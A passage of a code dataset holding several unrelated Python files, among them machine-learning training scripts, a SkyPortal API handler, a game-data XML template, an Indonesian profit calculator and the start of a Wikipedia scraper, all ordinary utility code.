lookbackward_epoch = 5, accumulated_epoch = len(h.history['loss']), limit_epoch = total_epoch_training, ending_epoch = 10)]\n                              )\n            h = combine_result(h, h_training_epoch)\n\n        round += 1\n        print(turn)\n    return h.history\n\n\n\n\n##Running the app\nif __name__ == \"__main__\":\n    result_history = main()\n    np.save('result_history.npy', result_history)\n","sub_path":"task-D-EB-EPD-local.py","file_name":"task-D-EB-EPD-local.py","file_ext":"py","file_size_in_byte":4826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"86846825","text":"import json\nimport logging\nfrom data_loader import DataLoader\nfrom model import LeNet\nfrom trainer import Trainer \n\ndef main():\n\twith open(\"config.json\", \"r\") as f:\n\t\tconfig = json.load(f)\n\n\t# Load Cifar data \n\tdata = DataLoader(config)\n\n\t# Create LeNet model\n\tnet = LeNet(config)\n\n\t# Create trainer\n\ttrainer = Trainer(net.model, data, config)\n\n\t# # Train model\n\t# trainer.train()\n\n\t# # Save LeNet model weights\n\t# trainer.save_weights()\n\n\t# Load weights\n\tload_path = config[\"trainer\"][\"save_dir\"] + config[\"experiment_name\"] + \\\n\t\t\t\"/\" + config[\"trainer\"][\"save_trained_name\"] + \"_full.hdf5\"\n\ttrainer.load_weights(load_path)\n\n\t# Evaluate validation set\n\ttrainer.evaluate()\n\nif __name__ == '__main__':\n\tlogging.basicConfig(level=logging.INFO, format='%(levelname)s:%(name)s: %(message)s')\n\n\tmain()","sub_path":"LeNet/Keras/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"596534073","text":"import sys\nimport re\n\nf_txt = open(\"badwords.txt\", 'r')\nbadWords = [line.rstrip('\\n').lower() for line in f_txt]\nf_txt.close()\n\nsample = input(\"Enter something you asshole: \").lower()\n\nmatching = [s for s in badWords if re.search(\"\\\\b\" + re.escape(s) + \"\\\\b\", sample.lower())]\nif(matching):\n\tprint(\"{} whatever\".format(set(matching)))","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"496994390","text":"\"\"\"Categorize Otto Group sales.\"\"\"\n\nfrom sklearn.pipeline import Pipeline\nfrom pandas import read_csv\n# from pandas.plotting import scatter_matrix\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nimport os\n\nfrom autoclf.classification import eval_utils as eu\nfrom autoclf.classification import evaluate as eva\nimport autoclf.getargs as ga\nfrom pkg_resources import resource_string\nfrom io import StringIO\n\nimport warnings\nwarnings.filterwarnings(\"ignore\", category=FutureWarning)\n\n\n# starting program\nif __name__ == '__main__':\n\n    print(\"### Probability Calibration Experiment 'Otto Group' \"\n          \"-- CalibratedClassifierCV with cv=cv (no prefit) ###\")\n    print()\n\n    d_name = ga.get_name()\n\n    if d_name is None:\n        d_name = \"OttoG\"\n\n    seed = 7\n    np.random.seed(seed)\n\n    # place your code here\n    try:\n        df = read_csv(\"datasets/otto_group_train.csv\", delimiter=\",\")\n    except FileNotFoundError as fe:\n        ottog_bytes = resource_string(\n            \"autoclf\", os.path.join(\"datasets\", 'otto_group_train.csv'))\n        ottog_file = StringIO(str(ottog_bytes,'utf-8'))\n\n        df = read_csv(ottog_file, delimiter=\",\")\n    except Exception as e:\n        raise e\n    \n    df_length = len(df.index)\n\n    ###\n    df = df.drop(['id'], axis=1)\n    print(df.shape)\n\n    description = 
df.describe()\n print(\"Description - no encoding:\\n\", description)\n\n print()\n\n target = 'target'\n\n # feature engineering\n\n sltt = eu.scoring_and_tt_split(df, target, 0.2, seed)\n\n X_train, X_test, y_train, y_test = sltt['arrays']\n scoring = sltt['scoring']\n Y_type = sltt['target_type']\n labels = sltt['labels']\n\n print()\n print(\"X_train shape: \", X_train.shape)\n print(\"X_train -- first row:\", X_train.values[0])\n print(\"y_train shape: \", y_train.shape)\n print()\n\n print(\"X_test shape: \", X_test.shape)\n print(\"X_test -- first row:\", X_test.values[0])\n print(\"y_test shape: \", y_test.shape)\n print()\n\n print(y_train[:3])\n # input(\"Enter key to continue... \\n\")\n\n print()\n print(\"scoring:\", scoring)\n print()\n\n auto_feat_eng_data = eu.auto_X_encoding(sltt, seed)\n\n print()\n\n eva.perform_classic_cv_evaluation_and_calibration(\n auto_feat_eng_data, scoring, Y_type, labels, d_name, seed)\n\n input(\"=== [End Of Program] Enter key to continue... \\n\")\n","sub_path":"examples/ottog_train.py","file_name":"ottog_train.py","file_ext":"py","file_size_in_byte":2343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"162193132","text":"from data.xml.templates.XMLEffectl import XMLEffect\nfrom data.xml.templates.XMLTemplate import XMLTemplate, XElement, XAttribElement, XInstance\nfrom structure.enums.Items import Items\nfrom structure.enums.Races import Races\nfrom structure.enums.WeaponWeight import WeaponWeight\n\n\nclass XMLThrowableWeapon(XMLTemplate):\n ROOT_NAME = 'throwableWeapon'\n OBJECT_TYPE = Items.THROWABLE_WEAPON\n\n\n def __init__(self):\n self.id = XElement('id')\n self.parent_id = XElement('parentId')\n self.name = XAttribElement('name', 'lang')\n self.description = XAttribElement('description', 'lang')\n self.price = XElement('price')\n self.weight = XElement('weight')\n self.initiative = XElement('initiative')\n self.strength = XElement('strength')\n self.rampancy = XElement('rampancy')\n self.rangeLow = XElement('rangeLow')\n self.rangeMedium = XElement('rangeMedium')\n self.amount = XElement('amount')\n self.rangeHigh = XElement('rangeHigh')\n self.defence = XElement('defence')\n\n self.weaponWeight = XElement('weaponWeight', WeaponWeight)\n self.racial = XElement('racial', Races)\n\n self.effects = XInstance('effects', XMLEffect)\n","sub_path":"Program/data/xml/templates/XMLThrowableWeapon.py","file_name":"XMLThrowableWeapon.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"633386188","text":"def uak(x,y,z):\n\tx=1\n\twhile x>0:\n\t\ty=input('Kode : n. Kembali ke menu awal; m. Keluar\\nPilihan anda : ')\n\t\tif y=='n':\n\t\t\tprint('\\x1bc')\n\t\t\tloading()\n\t\t\tx=-1\n\t\telif y=='m':\n\t\t\tquit()\n\t\telse:\n\t\t\tprint('\\x1bc')\n\t\t\tz()\n\t\t\tx=x+1\n\ndef loading():\n\tld=1\n\twhile ld<=50:\n\t\tprint('\\x1bc');print('='*ld);time.sleep(0.004)\n\t\tld=ld+1\n\t\tprint('\\x1bc')\n#IMPORT\nprint('\\x1bc')\nimport time\nimport math\n#ALAT\ndef k():\n\tprint('\\nkode :\\na. tambah\\ns. kali\\nl. 
lanjut\\nPilihan anda : ')\ndef res():\n\tprint('\\x1bc')\n\tprint('Uang masuk sejumlah Rp',masuk)\ndef res1():\n\tprint('\\x1bc')\n\tprint('Total saldo sejumlah Rp',tosal)\ndef res2():\n\tprint('\\x1bc')\n\tprint('Sisa saldo sejumlah Rp',sisal)\n#MENU AWAL\nprint('\\x1bc');print('S ### ###');print('E # # # #');print('L # # # # # #');print('A # # # #');print('M ##### #####');print('A');print('T ');print(' #################');print('D # #');print('A # #');print('T ## ##');print('A #######');print('N');print('G')\ntime.sleep(0.6)\nprint('\\x1bc');print('M ###');print('E # # ### #');print('T # # # # # #');print('A # # #');print('A #####');print('A');print(' ');print(' #################');print(' # #');print('A # #');print(' ## ##');print('A #######');print('');print('G')\ntime.sleep(0.2)\nprint('\\x1bc');print('M ### ###');print('I # # # #');print('T # # # # # #');print('R # # # #');print('A ##### #####');print('');print(' ');print(' #################');print(' # #');print(' # #');print(' ## ##');print(' #######');print('');print('')\ntime.sleep(0.6)\nprint('\\x1bc');print('MITRA TOKOPEDIA ASISTANT\\nmetode penghitungan semi otomatis untuk mitra')\ntime.sleep(2.5)\nmn=1\nwhile mn>0:\n\tprint('\\x1bc')\n\tprint('^<^ : MENU UTAMA\\n\\nAda yang bisa kami bantu?\\n\\nkode :\\n1. Menghitung keuntungan\\n2. Statistik keuntungan\\n3. Intruksi penggunaan\\n4. Tentang pembuat\\n5. Keluar')\n\tmenu=input('Pilihan anda : ')\n\tif menu=='1':\n#MENU PERTAMA\n\t\t#UANG MASUK\n\t\tloading()\n\t\tawal=1\n\t\twhile awal>0:\n\t\t\tmasuk=int(input('MASUKKAN UANG MASUK\\nRp'))\n\t\t\tk()\n\t\t\thit=1\n\t\t\twhile hit>0:\n\t\t\t\tpencet=input('')\n\t\t\t\tif pencet=='a':\n\t\t\t\t\tmasuk1=int(input('Rp'))\n\t\t\t\t\tmasuk=masuk+masuk1\n\t\t\t\t\tres()\n\t\t\t\t\thit=hit+1\n\t\t\t\t\tk()\n\t\t\t\telif pencet=='s':\n\t\t\t\t\tmasuk1=int(input('Rp'))\n\t\t\t\t\tmasuk=masuk*masuk1\n\t\t\t\t\tres()\n\t\t\t\t\thit=hit+1\n\t\t\t\t\tk()\n\t\t\t\telif pencet=='l':\n\t\t\t\t\tloading()\n\t\t\t\t\t#TOTAL SALDO\n\t\t\t\t\ttosal=int(input('MASUKKAN TOTAL SALDO\\nRp'))\n\t\t\t\t\tk()\n\t\t\t\t\thit2=1\n\t\t\t\t\twhile hit2>0:\n\t\t\t\t\t\tpencet=input('')\n\t\t\t\t\t\tif pencet=='a':\n\t\t\t\t\t\t\ttosal1=int(input('Rp'))\n\t\t\t\t\t\t\ttosal=tosal+tosal1\n\t\t\t\t\t\t\tres1()\n\t\t\t\t\t\t\thit2=hit2+1\n\t\t\t\t\t\t\tk()\n\t\t\t\t\t\telif pencet=='s':\n\t\t\t\t\t\t\ttosal1=int(input('Rp'))\n\t\t\t\t\t\t\ttosal=tosal*tosal1\n\t\t\t\t\t\t\tres1()\n\t\t\t\t\t\t\thit2=hit2+1\n\t\t\t\t\t\t\tk()\n\t\t\t\t\t\telif pencet=='l':\n\t\t\t\t\t\t\tloading()\n\t\t\t\t\t\t\t#SISA SALDO\n\t\t\t\t\t\t\tsisal= int(input('MASUKKAN SISA SALDO\\nRp'))\n\t\t\t\t\t\t\tk()\n\t\t\t\t\t\t\thit3=1\n\t\t\t\t\t\t\twhile hit3>0:\n\t\t\t\t\t\t\t\tpencet=input('')\n\t\t\t\t\t\t\t\tif pencet=='a':\n\t\t\t\t\t\t\t\t\tsisal1=int(input('Rp'))\n\t\t\t\t\t\t\t\t\tsisal=sisal+sisal1\n\t\t\t\t\t\t\t\t\tres2()\n\t\t\t\t\t\t\t\t\thit3=hit3+1\n\t\t\t\t\t\t\t\t\tk()\n\t\t\t\t\t\t\t\telif pencet=='s':\n\t\t\t\t\t\t\t\t\tsisal1=int(input('Rp'))\n\t\t\t\t\t\t\t\t\tsisal=sisal*sisal1\n\t\t\t\t\t\t\t\t\tres2()\n\t\t\t\t\t\t\t\t\thit3=hit3+1\n\t\t\t\t\t\t\t\t\tk()\n\t\t\t\t\t\t\t\telif pencet=='l':\n\t\t\t\t\t\t\t\t\tloading()\n\t\t\t\t\t\t\t\t\t#OPERASI HITUNG\n\t\t\t\t\t\t\t\t\tdef oph():\n\t\t\t\t\t\t\t\t\t\tprint('\\x1bc')\n\t\t\t\t\t\t\t\t\t\tprint('\\nJADI,\\nUang masuk = Rp',masuk,'\\nTotal saldo = Rp',tosal,'\\nSisa saldo = Rp',sisal)\n\t\t\t\t\t\t\t\t\t\tprint('\\nMAKA,\\nPendapatan = Rp', masuk,'\\nPengeluaran = Rp', tosal-sisal,'\\nUntung = Rp', 
masuk-(tosal-sisal),'\\n\\n*Silahkan catat di buku catatan\\n')\n\t\t\t\t\t\t\t\t\toph()\n\t\t\t\t\t\t\t\t\t#AKHIRI/ULANGI SESI\n\t\t\t\t\t\t\t\t\tuak(1,2,oph)\n\t\t\t\t\t\t\t\t\thit3=-1\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tres2()\n\t\t\t\t\t\t\t\t\tk()\n\t\t\t\t\t\t\t\t\thit3=hit3+1\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\thit2=-1\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tres1()\n\t\t\t\t\t\t\tk()\n\t\t\t\t\t\t\thit2=hit2+1\n\t\t\t\t\telse:\n\t\t\t\t\t\thit=-1\n\t\t\t\telse:\n\t\t\t\t\tres()\n\t\t\t\t\tk()\n\t\t\t\t\thit=hit+1\n\t\t\telse:\n\t\t\t\tawal=-1\n\t\telse:\n\t\t\tmn=mn+1\n\telif menu=='2':\n\t\tloading()\n#MENU KEDUA\n\t\tvar1=float(input('Keuntungan pada bulan pertama : Rp'))\n\t\tvar2=float(input('Keuntungan pada bulan kemarin : Rp'))\n\t\tvar3=float(input('Keuntungan pada bulan sekarang : Rp'))\n\t\tnilaimx=max(var1,var2,var3)\n\t\tvar4=((var3/var1))*100-100\n\t\tvar5=((var3/var2))*100-100\n\t\tloading()\n\t\tdef aou2():\n\t\t\tprint('MAKA,\\nKenaikan untung terhadap bulan pertama : ',var4,' %')\n\t\t\tprint('Kenaikan untung terhadap bulan kemarin : ',var5, ' %')\n\t\t\tsttvar1=round((var1/nilaimx)*50)\n\t\t\tsttvar2=round((var2/nilaimx)*50)\n\t\t\tsttvar3=round((var3/nilaimx)*50)\n\t\t\tprint('Untung bulan pertama : \\n'+']'*sttvar1,'\\n')\n\t\t\tprint('Untung bulan kemarin : \\n'+']'*sttvar2,'\\n')\n\t\t\tprint('Untung bulan sekarang : \\n'+']'*sttvar3,'\\n')\n\t\t\tprint('\\n*Silahkan catat di buku catatan\\n')\n\t\taou2()\n\t\t#AKHIRI/ULANGI SESI\n\t\tuak(3,4,aou2)\n\t\tmn=mn+1\n#MENU KETIGA\n\telif menu=='3':\n\t\tloading()\n\t\tdef aou3():\n\t\t\tprint('^<^ : INTRUKSI PENGGUNAAN\\n');print('Hanya masukkan angka pada saat memasukkan nilai uang\\nJika dilanggar : akan muncul EROR\\n\\nHanya masukkan kode yang ada di dalam list kode\\nJika dilanggar : perintah tidak akan tersampaikan')\n\t\taou3()\n\t\t#AKHIRI/ULANGI SESI\n\t\tprint('\\n'*6)\n\t\tuak(5,6,aou3)\n\t\tmn=mn+1\n#MENU KEEMPAT\n\telif menu=='4':\n\t\tloading()\n\t\tdef aou4():\n\t\t\tprint('^<^ : TENTANG PEMBUAT\\n');print('Gmail : hamdanduaenamprog@gmail.com\\n\\nGithub : HamdanProg\\n\\nFacebook : Bang Hamdan')\n\t\taou4()\n\t\t#AKHIRI/ULANGI SESI\n\t\tprint('\\n'*6)\n\t\tuak(7,8,aou4)\n\t\tmn=mn+1\n#MENU KELIMA\n\telif menu=='5':\n\t\tquit()\n#ELSE\n\telse:\n\t\tmn=mn+1","sub_path":"MTPAv2.4.py","file_name":"MTPAv2.4.py","file_ext":"py","file_size_in_byte":5925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"233218665","text":"import tornado.web\nfrom sqlalchemy.orm import joinedload\nfrom sqlalchemy import func\nimport arrow\nfrom functools import reduce\nfrom marshmallow.exceptions import ValidationError\nfrom baselayer.app.access import permissions, auth_or_token\nfrom .base import BaseHandler\nfrom ..models import (DBSession, Comment, Instrument, Photometry, Source,\n Thumbnail, GroupSource, Token, User)\n\n\nSOURCES_PER_PAGE = 100\n\n\nclass SourceHandler(BaseHandler):\n @auth_or_token\n def get(self, source_id=None):\n \"\"\"\n ---\n single:\n description: Retrieve a source\n parameters:\n - in: path\n name: source_id\n required: false\n schema:\n type: integer\n responses:\n 200:\n content:\n application/json:\n schema: SingleSource\n 400:\n content:\n application/json:\n schema: Error\n multiple:\n description: Retrieve all sources\n parameters:\n - in: query\n name: page\n schema:\n type: integer\n description: Queries are limited to 100 per page. 
This selects the page to download.\n          responses:\n            200:\n              content:\n                application/json:\n                  schema: ArrayOfSources\n            400:\n              content:\n                application/json:\n                  schema: Error\n        \"\"\"\n        info = {}\n        page_number = self.get_query_argument('page', None)\n        if source_id:\n            info['sources'] = Source.get_if_owned_by(\n                source_id, self.current_user,\n                options=[joinedload(Source.comments),\n                         joinedload(Source.thumbnails)\n                         .joinedload(Thumbnail.photometry)\n                         .joinedload(Photometry.instrument)\n                         .joinedload(Instrument.telescope)])\n        elif page_number:\n            page = int(page_number)\n            q = Source.query.filter(Source.id.in_(DBSession.query(\n                GroupSource.source_id).filter(GroupSource.group_id.in_(\n                    [g.id for g in self.current_user.groups]))))\n            all_matches = q.all()\n            info['totalMatches'] = len(all_matches)\n            info['sources'] = all_matches[\n                ((page - 1) * SOURCES_PER_PAGE):(page * SOURCES_PER_PAGE)]\n            info['pageNumber'] = page\n            info['sourceNumberingStart'] = (page - 1) * SOURCES_PER_PAGE + 1\n            info['sourceNumberingEnd'] = min(info['totalMatches'],\n                                             page * SOURCES_PER_PAGE)\n            info['lastPage'] = info['totalMatches'] <= page * SOURCES_PER_PAGE\n            if info['totalMatches'] == 0:\n                info['sourceNumberingStart'] = 0\n        else:\n            if isinstance(self.current_user, Token):\n                token = self.current_user\n                info['sources'] = list(reduce(\n                    set.union, (set(group.sources) for group in token.groups)))\n            else:\n                info['sources'] = self.current_user.sources\n\n        if info['sources'] is not None:\n            return self.success(data=info)\n        else:\n            return self.error(f\"Could not load source {source_id}\",\n                              data={\"source_id\": source_id})\n\n    @permissions(['Manage sources'])\n    def post(self):\n        \"\"\"\n        ---\n        description: Upload a source\n        parameters:\n          - in: path\n            name: source\n            schema: Source\n        responses:\n          200:\n            content:\n              application/json:\n                schema:\n                  allOf:\n                    - Success\n                    - type: object\n                      properties:\n                        id:\n                          type: integer\n                          description: New source ID\n        \"\"\"\n        data = self.get_json()\n\n        s = Source(ra=data['sourceRA'], dec=data['sourceDec'],\n                   redshift=data.get('redshift'))\n        DBSession().add(s)\n        DBSession().commit()\n\n        return self.success(data={\"id\": s.id}, action='cesium/FETCH_SOURCES')\n\n    @permissions(['Manage sources'])\n    def put(self, source_id):\n        \"\"\"\n        ---\n        description: Update a source\n        parameters:\n          - in: path\n            name: source\n            schema: Source\n        responses:\n          200:\n            content:\n              application/json:\n                schema: Success\n          400:\n            content:\n              application/json:\n                schema: Error\n        \"\"\"\n        data = self.get_json()\n        data['id'] = source_id\n\n        schema = Source.__schema__()\n        try:\n            schema.load(data)\n        except ValidationError as e:\n            return self.error('Invalid/missing parameters: '\n                              f'{e.normalized_messages()}')\n        DBSession().commit()\n\n        return self.success(action='cesium/FETCH_SOURCES')\n\n    @permissions(['Manage sources'])\n    def delete(self, source_id):\n        \"\"\"\n        ---\n        description: Delete a source\n        parameters:\n          - in: path\n            name: source\n            schema:\n              Source\n        responses:\n          200:\n            content:\n              application/json:\n                schema: Success\n        \"\"\"\n        s = Source.query.get(source_id)\n        DBSession().delete(s)\n        DBSession().commit()\n\n        return self.success(action='cesium/FETCH_SOURCES')\n\n\nclass FilterSourcesHandler(BaseHandler):\n    @auth_or_token\n    def post(self):\n        data = self.get_json()\n        info = {}\n        page = int(data.get('pageNumber', 1))\n        info['pageNumber'] = page\n        q = Source.query.filter(Source.id.in_(DBSession.query(\n            GroupSource.source_id).filter(GroupSource.group_id.in_(\n                [g.id for g in self.current_user.groups]))))\n\n        if data['sourceID']:\n            q = 
q.filter(Source.id.contains(data['sourceID'].strip()))\n if data['ra'] and data['dec'] and data['radius']:\n ra = float(data['ra'])\n dec = float(data['dec'])\n radius = float(data['radius'])\n q = q.filter(Source.ra <= ra + radius)\\\n .filter(Source.ra >= ra - radius)\\\n .filter(Source.dec <= dec + radius)\\\n .filter(Source.dec >= dec - radius)\n if data['startDate']:\n start_date = arrow.get(data['startDate'].strip())\n q = q.filter(Source.last_detected >= start_date)\n if data['endDate']:\n end_date = arrow.get(data['endDate'].strip())\n q = q.filter(Source.last_detected <= end_date)\n if data['simbadClass']:\n q = q.filter(func.lower(Source.simbad_class) ==\n data['simbadClass'].lower())\n if data['hasTNSname']:\n q = q.filter(Source.tns_name.isnot(None))\n\n all_matches = list(q)\n info['totalMatches'] = len(all_matches)\n info['sources'] = all_matches[\n ((page - 1) * SOURCES_PER_PAGE):(page * SOURCES_PER_PAGE)]\n info['lastPage'] = info['totalMatches'] <= page * SOURCES_PER_PAGE\n info['sourceNumberingStart'] = (page - 1) * SOURCES_PER_PAGE + 1\n info['sourceNumberingEnd'] = min(info['totalMatches'],\n page * SOURCES_PER_PAGE)\n if info['totalMatches'] == 0:\n info['sourceNumberingStart'] = 0\n\n return self.success(data=info)\n","sub_path":"skyportal/handlers/source.py","file_name":"source.py","file_ext":"py","file_size_in_byte":7709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"250254655","text":"\"\"\"Checks community branch dir structure to see who submitted most\r\n and what challenge is more popular by number of PRs\"\"\"\r\nfrom collections import Counter, namedtuple\r\nimport os\r\nimport urllib.request\r\nimport re\r\n\r\n# prep\r\ntmp = os.getenv(\"TMP\", \"/tmp\")\r\ntempfile = os.path.join(tmp, 'dirnames')\r\nurllib.request.urlretrieve(\r\n 'https://bites-data.s3.us-east-2.amazonaws.com/dirnames.txt',\r\n tempfile\r\n)\r\n\r\nIGNORE = 'static templates data pybites bbelderbos hobojoe1848'.split()\r\n\r\nusers, popular_challenges = Counter(), Counter()\r\n\r\nStats = namedtuple('Stats', 'user challenge')\r\n\r\n\r\n# code\r\n\r\ndef gen_files():\r\n \"\"\"Return a generator of dir names reading in tempfile\r\n\r\n tempfile has this format:\r\n\r\n challenge/file_or_dir,is_dir\r\n 03/rss.xml,False\r\n 03/tags.html,False\r\n ...\r\n 03/mridubhatnagar,True\r\n 03/aleksandarknezevic,True\r\n\r\n -> use last column to filter out directories (= True)\r\n \"\"\"\r\n for line in open(tempfile):\r\n if 'True' in line:\r\n yield re.search(r'/(.*),' ,line).group(1)\r\n\r\n\r\ndef diehard_pybites():\r\n \"\"\"Return a Stats namedtuple (defined above) that contains the user that\r\n made the most PRs (ignoring the users in IGNORE) and a challenge tuple\r\n of most popular challenge and the amount of PRs for that challenge.\r\n Calling this function on the dataset (held tempfile) should return:\r\n Stats(user='clamytoe', challenge=('01', 7))\r\n \"\"\"\r\n Stats = namedtuple('Stats', 'user, challenge')\r\n challenges = list()\r\n users = [x for x in gen_files() if x not in IGNORE]\r\n for line in open(tempfile):\r\n if any(word in re.search(r'/(.*),' ,line).group(1) for word in IGNORE):\r\n continue\r\n elif 'True' in line:\r\n challenges.append(re.search(r'^(.*)/' ,line).group(1))\r\n challenges = Counter(challenges)\r\n users = Counter(users)\r\n high_user = users.most_common(1)[0][0]\r\n high_challenge = challenges.most_common(1)[0]\r\n return Stats(user=high_user, 
challenge=high_challenge)\r\n","sub_path":"6/pcc_stats.py","file_name":"pcc_stats.py","file_ext":"py","file_size_in_byte":2084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"117265866","text":"from keras.models import Sequential\nfrom keras.layers import Dense, Dropout\nfrom keras.callbacks import EarlyStopping\nfrom sklearn.metrics import mean_squared_error, mean_absolute_error, explained_variance_score, r2_score\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport pandas as pd\n\nearly_stopper = EarlyStopping(patience=5)\n\ndef compile_model(network, input_shape):\n \"\"\"\n\n :param network dict: dictionary with network parameters\n :param input_shape tuple: tuple with tradin data shape\n :return: compiled model\n \"\"\"\n\n nb_layers = network.get('n_layers', 2)\n nb_neurons = network.get('n_neurons', 10)\n activation = network.get('activations', 'linear')\n optimizer = network.get('optimizers', 'adam')\n\n model = Sequential()\n\n model.add(Dense(nb_neurons, activation=activation, input_shape=input_shape))\n model.add(Dropout(network.get('dropout', 1)))\n for i in range(nb_layers - 1):\n model.add(Dense(nb_neurons, activation=activation))\n model.add(Dropout(network.get('dropout', 1)))\n\n model.add(Dense(\n network.get('last_layer_neurons', 1),\n activation=network.get('last_layer_activations', 'linear'),\n ))\n\n model.compile(loss=network.get('losses', 'mse'), optimizer=optimizer)\n\n return model\n\n\ndef train_and_score(network, x_train, y_train, x_test, y_test):\n \"\"\"\n\n :param network dict: dictionary with network parameters\n :param x_train array: numpy array with features for traning\n :param y_train array: numpy array with labels for traning\n :param x_test array: numpy array with labels for test\n :param y_test array: numpy array with labels for test\n :return float: score\n \"\"\"\n\n model = compile_model(network, (x_train.shape[1],))\n\n model.fit(x_train, y_train,\n batch_size=network.get('batch_size', 128),\n epochs=10, # using early stopping, so no real limit\n verbose=network.get('verbose', 0))\n #validation_data=(x_test, y_test),\n #callbacks=[early_stopper])\n\n #score = model.evaluate(x_test, y_test, verbose=0)\n \n y_pred = model.predict(np.array(x_test))\n y_pred = np.concatenate(y_pred)\n\n true = y_test\n pred = y_pred\n\n print(' R2 = ', r2_score(true, pred))\n\n return r2_score(true, pred), model\n","sub_path":"MLP_regression_evolution/mlp_train.py","file_name":"mlp_train.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"603644823","text":"import json\nimport pandas as pd\nfrom a4_optimise.optimise import select_team\nfrom a0_helpers.constants import DIR_DATA_RAW_BOOTSTRAP\n\npd.options.display.width = 250\npd.options.display.max_columns = 25\n\nHISTORY_PAST = 'history_past' # History Previous Seasons\nFIELDS_META = ['code', 'first_name', 'second_name', 'team_name', 'player_position', 'now_cost']\nFIELD_FEATURE = ['total_points']\nFIELD_PRED = ['points_predicted']\n\n\ndef combine(df_players, df_teams, df_positions):\n df_teams = df_teams[['code', 'name']]\n df_teams.columns = ['team_code', 'team_name']\n df_positions = df_positions[['id', 'singular_name_short']]\n df_positions.columns = ['element_type', 'player_position']\n df_week = df_players.merge(df_teams, on='team_code').merge(df_positions, on='element_type')\n return df_week\n\n\ndef transform_boostrap(dir_data_raw_hist):\n 
list_df = []\n for file_path in dir_data_raw_hist.iterdir():\n print(f'Processing file {file_path.name}')\n with open(file_path, encoding=\"utf8\") as file_in:\n bootstrap_json = json.loads(file_in.read())\n\n df_players = pd.DataFrame(bootstrap_json['elements'])\n df_teams = pd.DataFrame(bootstrap_json['teams'])\n df_positions = pd.DataFrame(bootstrap_json['element_types'])\n\n df_week = combine(df_players, df_teams, df_positions)\n df_week[FIELD_PRED] = df_week[FIELD_FEATURE] / 38\n df_final = df_week[FIELDS_META + FIELD_PRED]\n\n list_df.append(df_final)\n\n df_boostrap = pd.concat(list_df)\n return df_boostrap\n\n\ndef main():\n df_boostrap = transform_boostrap(DIR_DATA_RAW_BOOTSTRAP)\n # df_boostrap.to_csv('output.csv', index=False, encoding='utf-8-sig')\n df_team = select_team(df_boostrap)\n print(df_team)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"code/a5_strategy/baseline.py","file_name":"baseline.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"174959833","text":"#! /usr/bin/env python\n# -*- mode: python; coding: utf-8 -*-\n# Copyright 2017 the HERA Collaboration\n# Licensed under the 2-clause BSD license.\n\n\"\"\"This publishes a webpage on paper1 (leveraging the rails stuff) that includes power levels.\nIf not on qmaster, it just writes the html file.\n\n\"\"\"\nfrom __future__ import absolute_import, division, print_function\n\nfrom hera_mc import mc, cm_utils, sys_handling\n\nif __name__ == '__main__':\n default_hookup_cols = ['station', 'front-end', 'cable-post-amp(in)', 'post-amp', 'cable-container', 'f-engine', 'level']\n parser = mc.get_mc_argument_parser()\n # set values for 'action' to use\n parser.add_argument('-p', '--hpn', help=\"Part number, csv-list (required). HH\", default='HH')\n parser.add_argument('-r', '--revision', help=\"Specify revision or last/active/full/all for hpn. [A]\", default='A')\n parser.add_argument('-e', '--exact-match', help=\"Force exact matches on part numbers, not beginning N char. 
[False]\",\n dest='exact_match', action='store_true')\n parser.add_argument('-f', '--force-new', dest='force_new', help=\"Force it to write a new hookup file.\", action='store_true')\n parser.add_argument('--hookup-cols', help=\"Specify a subset of parts to show in mapr, comma-delimited no-space list.\",\n dest='hookup_cols', default=default_hookup_cols)\n\n args = parser.parse_args()\n\n # Pre-process the args\n args.hpn = cm_utils.listify(args.hpn)\n args.hookup_cols = cm_utils.listify(args.hookup_cols)\n\n # Start session\n db = mc.connect_to_mc_db(args)\n session = db.sessionmaker()\n\n system = sys_handling.Handling(session)\n system.publish_summary(args.hpn, rev=args.revision, exact_match=args.exact_match, hookup_cols=args.hookup_cols,\n force_new_hookup_dict=args.force_new)\n","sub_path":"scripts/mc_publish_sys_levels.py","file_name":"mc_publish_sys_levels.py","file_ext":"py","file_size_in_byte":1842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"478976389","text":"#!/usr/bin/python3.3\n\n\"\"\"\nID TABLEAU DONNEES WIKIPEDIA\n0 : Ville\n0 : Telephone\n0 : Architecture\n0 : Personnalite\n0 : Film\n0 : Bateau\n3 : Element chimique\n+1 : si bandeau en tableau indiquant modif de l'article à faire (ex: linux)\n+1 : si bandeau en tableau indiquant la présence d'homonymie (ex: google)\n\nFONCTIONS:\n-translation de mot:\n Réalisation=réalisateur,cinéaste\n Masse=poids\n Dimensions=taille\n Créé par/Scénario=auteur,dessinateur\n Pays:origine\n+gestion homonymes: proposer les différents choix et en retenir les urls\n-gestion urls complexes: faire recherche et proposer les choix et retenir les urls\n-multiple backends: wikipedia, google, etc\n\nERREURS:\n+Demander le département d'une ville\n+problème avec les urls en UTF-8+\n+absence de th sur certaines pages (ex:Tintin)\n\nA TESTER:\nutiliser http://fr.mobile.wikipedia.org/ pour plus de rapidite\n\"\"\"\n\nimport urllib.request\nimport re\n\ndef demandeChoix(page):\n 